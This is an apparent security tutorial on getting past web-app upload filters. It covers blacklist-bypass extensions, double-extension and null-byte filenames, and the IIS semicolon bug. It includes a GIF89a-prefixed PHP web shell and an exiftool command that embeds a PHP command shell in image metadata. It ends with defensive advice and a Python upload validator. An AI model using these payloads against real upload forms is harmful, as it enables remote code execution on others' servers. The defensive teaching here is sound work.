User-uploaded files give attackers a potential entry point into web applications, which makes handling them safely an important task for administrators and the security team. If uploads are not validated properly, a remote attacker can place a malicious file on the web server and, if the server ever executes it, gain code execution. OWASP groups the problems behind unrestricted file upload into two classes: those arising from the file's metadata, such as its path and name, and those arising from its content and size. Most web apps apply restrictions to make these attacks harder, but there are several techniques attackers use to get past upload filters and end up with a reverse shell.
Blacklisting is a form of protection in which certain strings, usually specific file extensions, are explicitly rejected by the web application. This may sound like the right way to keep dangerous extensions (often web shells) off your server, but blacklists are not hard to bypass.
Here are some alternative extensions that can be used to get around blacklist filters. Which of them actually execute depends on the server's handler configuration, and the mixed-case ones (.phP, .Php) only help when the filter compares case-sensitively while the server maps extensions case-insensitively:
php.txt, .sh, .pht, .phtml, .phP, .Php, .php7, .php%00.jpeg, .cgi
Another popular choice for web shells is JSP, a server-generated web page similar to an .ASP or .PHP file but containing Java code instead of ActiveX or PHP. Related extensions worth trying against Java application servers (and .aspx against ASP.NET on IIS):
.MF, .jspx, .jspf, .jsw, .jsv, .xml, .war, .jsp, .aspx
The second method is whitelisting. As the name says, it is the opposite of blacklisting: the server only accepts a fixed set of extensions such as jpeg, gif, png and jpg. This is a better way of protecting a server than a blacklist, but it can still be bypassed with a few tricks, and there are records of server-side bugs that let users get around it. One of them:
The IIS 6 semicolon vulnerability, a parser bug that let users upload and execute files with names such as testing.asp;.jpg, because IIS stopped interpreting the name at the semicolon and ran the file as ASP.
Using a double extension, attackers can fool a whitelist that only looks at the final extension into accepting a PHP reverse shell whose name also ends in .jpg or .png. Whether the server then executes it depends on its configuration: Apache's mod_mime treats every dot-separated part of a filename as an extension, so with an AddHandler-based PHP mapping the file is still handed to PHP, while a FilesMatch rule anchored on the final extension is not fooled:
payload.php.jpg
Null byte injection can also bypass whitelist filters: the filter sees the allowed extension at the end of the name, but the code that later saves the file (or the C string functions underneath it) treats the NUL byte as the end of the string, so everything after it is dropped and the file lands on disk as payload.php. This worked against PHP before 5.3.4, which started rejecting filenames containing NUL. Inject it between the forbidden extension and the allowed one:
payload.php%00.jpg (URL-encoded) OR payload.php\x00.jpg (raw byte)
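To make concrete how the filters above are beaten, here is an added Python model (not code from the original article) of a naive blacklist, a naive whitelist, the C-string truncation that made the null byte trick work in old PHP, and the two Apache handler configurations that decide whether a double-extension file runs. The extension sets and the AddHandler versus FilesMatch behaviour are assumptions chosen to match a typical mod_php setup.

```python
# Added example, not from the original article. Models how naive upload filters
# and a typical Apache/mod_php setup treat the bypass filenames discussed above.
# The sets below are assumptions standing in for a real server configuration.
import os

EXECUTABLE = {".php", ".phtml", ".pht", ".php7", ".phar"}   # what the server runs as PHP
DANGEROUS_BLACKLIST = {".php"}                               # what a naive blacklist blocks
IMAGE_WHITELIST = {".jpg", ".jpeg", ".png", ".gif"}          # what a naive whitelist allows


def last_extension(name: str) -> str:
    """The only thing a naive filter looks at: the text after the final dot."""
    return os.path.splitext(name)[1]


def blacklist_allows(name: str) -> bool:
    """Naive blacklist: case-sensitive comparison of the last extension only."""
    return last_extension(name) not in DANGEROUS_BLACKLIST


def whitelist_allows(name: str) -> bool:
    """Naive whitelist: accepts if the last extension is an image extension."""
    return last_extension(name).lower() in IMAGE_WHITELIST


def c_string_truncate(name: str) -> str:
    """PHP before 5.3.4 handed filenames to C string functions, which stop at NUL."""
    return name.split("\x00", 1)[0]


def apache_addhandler_executes(name: str) -> bool:
    """Apache with `AddHandler application/x-httpd-php .php`: mod_mime treats
    every dot-separated part as an extension (case-insensitively), so
    shell.php.jpg and shell.phP are both handed to PHP."""
    parts = name.split(".")[1:]            # drop the base name
    return any("." + p.lower() in EXECUTABLE for p in parts)


def apache_filesmatch_executes(name: str) -> bool:
    """Apache with `<FilesMatch "\\.php$"> SetHandler ...`: only the final
    extension matters, so the double extension trick no longer works."""
    return last_extension(name).lower() in EXECUTABLE


def survey(names):
    """Return, for each filename, which naive filter lets it through and
    whether each Apache configuration would execute it."""
    return {
        n: {
            "blacklist_allows": blacklist_allows(n),
            "whitelist_allows": whitelist_allows(n),
            "saved_as_by_old_php": c_string_truncate(n),
            "runs_with_addhandler": apache_addhandler_executes(n),
            "runs_with_filesmatch": apache_filesmatch_executes(n),
        }
        for n in names
    }


if __name__ == "__main__":
    for name, result in survey(["shell.phtml", "shell.phP", "shell.php.jpg",
                                "shell.php\x00.jpg"]).items():
        print(repr(name), result)
```

The table this prints shows the three failure modes separately: the blacklist is beaten by an extension it never listed or by case, the whitelist by a name whose final extension is an image while Apache still finds .php in the middle, and the null byte by the gap between what the filter checks and what old PHP actually wrote to disk.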
If a whitelist only accepts images, it usually accepts GIF files too, and it may check the content by looking at the first bytes of the file rather than trusting the extension. Adding the GIF89a signature at the very top of your shell makes such a check classify the file as a GIF; PHP ignores the leading bytes and runs whatever is inside the <?php ... ?> block. The file still has to be executed as PHP, so combine this with one of the extension tricks above or with a local file inclusion bug:
GIF89a; <?php system($_GET['cmd']); ?>
The next method uses the Exif metadata that any image can carry, such as location, name, camera model and much more. A PHP payload stored in a metadata field is not executed on upload; it runs whenever the web app later passes the file through the PHP interpreter, for example when a vulnerable script includes the image or when the file is stored under an executable extension.
You can add your payload with a tool like exiftool.
Inserting a short command shell into the photo's DocumentName tag looks like this; the __halt_compiler() call stops PHP from trying to parse the binary image data that follows the payload:
$ exiftool -DocumentName="<h1>chiara<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" pwtoken.jpeg
Run exiftool on the photo again to confirm the tag has been written:
$ exiftool pwtoken.jpeg
Then rename the file so that it gets executed once it reaches the web app server, using the double extension trick. Note that a shell cannot put a real NUL byte into a filename (writing \x00 on the command line produces four literal characters), so the null byte variant has to be injected into the filename field of the upload request itself, for instance with an intercepting proxy:
$ mv pwtoken.jpeg pwtoken.php.jpg
Combine this with the extension tricks described at the beginning of the article to get past blacklists, whitelists, or both.
Defending against these tricks: restrict the file types accepted for upload by checking the extension against a whitelist rather than a blacklist, and compare case-insensitively. Reject names with more than one extension, such as .php.png, and names without a base name, such as .htaccess (on ASP.NET, also configuration files such as web.config). Reject filenames containing NUL or other control characters. Check that the content matches the claimed type, at minimum by magic bytes and better by re-encoding images with an image library so that embedded metadata and appended code are discarded. Store uploads outside the web root, or in a directory where execution is disabled, with non-executable permissions, and rename every uploaded file to a server-generated name so the client never controls what ends up on disk.
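An added example, not from the original article, of a server-side validator that applies the points above: a single whitelisted extension, a magic-byte check against the claimed type, rejection of control characters and dotfiles, a size limit, a random server-chosen filename and non-executable storage. The allowed types, the size limit and the assumption that upload_dir lives outside the web root are choices made for the example.

```python
# Added example, not from the original article: server-side upload validation
# implementing the defences listed above. Standard library only; ALLOWED,
# MAX_BYTES and the upload directory are assumptions for the example.
import os
import secrets

ALLOWED = {                       # extension -> acceptable leading bytes (magic)
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024


class RejectedUpload(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_upload(client_name: str, data: bytes) -> str:
    """Return a new, randomly generated filename if the upload is acceptable,
    otherwise raise RejectedUpload. The client-supplied name is used only to
    read the claimed extension; it never reaches the filesystem."""
    if any(ord(c) < 32 for c in client_name):
        raise RejectedUpload("control character (e.g. NUL) in filename")
    # Strip any path the client sent, then require exactly <name>.<ext>:
    # 'cat.jpg' passes, 'shell.php.jpg' (two extensions) and '.htaccess'
    # (no base name) do not.
    base = client_name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    parts = base.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        raise RejectedUpload("filename must be <name>.<ext> with a single extension")
    ext = parts[1].lower()                       # case-insensitive whitelist compare
    if ext not in ALLOWED:
        raise RejectedUpload(f"extension .{ext} not in whitelist")
    if len(data) > MAX_BYTES:
        raise RejectedUpload("file too large")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise RejectedUpload("content does not match claimed type")
    # Server-chosen random name; the extension is the validated one, not the client's text.
    return f"{secrets.token_hex(16)}.{ext}"


def accepted(client_name: str, data: bytes) -> bool:
    """Convenience wrapper: True if validate_upload() would accept the file."""
    try:
        validate_upload(client_name, data)
        return True
    except RejectedUpload:
        return False


def store(client_name: str, data: bytes, upload_dir: str) -> str:
    """Write the validated file under its random name with non-executable
    permissions. upload_dir is assumed to sit outside the web root and to be
    served through a download handler, never directly by the web server."""
    new_name = validate_upload(client_name, data)
    path = os.path.join(upload_dir, new_name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    for name, content in [("cat.jpg", jpeg), ("shell.php.jpg", jpeg),
                          (".htaccess", b"x"), ("shell.php\x00.jpg", jpeg),
                          ("shell.gif", b"GIF89a;<?php system($_GET['cmd']); ?>")]:
        print(repr(name), "accepted" if accepted(name, content) else "rejected")
```

Note what the last sample shows: the GIF89a polyglot passes the magic-byte check and is accepted as a .gif. That is expected, and it is harmless here only because of the other layers: the file is stored under a random name with the .gif extension in a directory the web server never executes from. If the application must be certain no code survives inside an image, re-encode it with an image library (Pillow's Image.open(...).save(...) is the usual choice), which rewrites the pixel data and drops metadata such as the DocumentName tag.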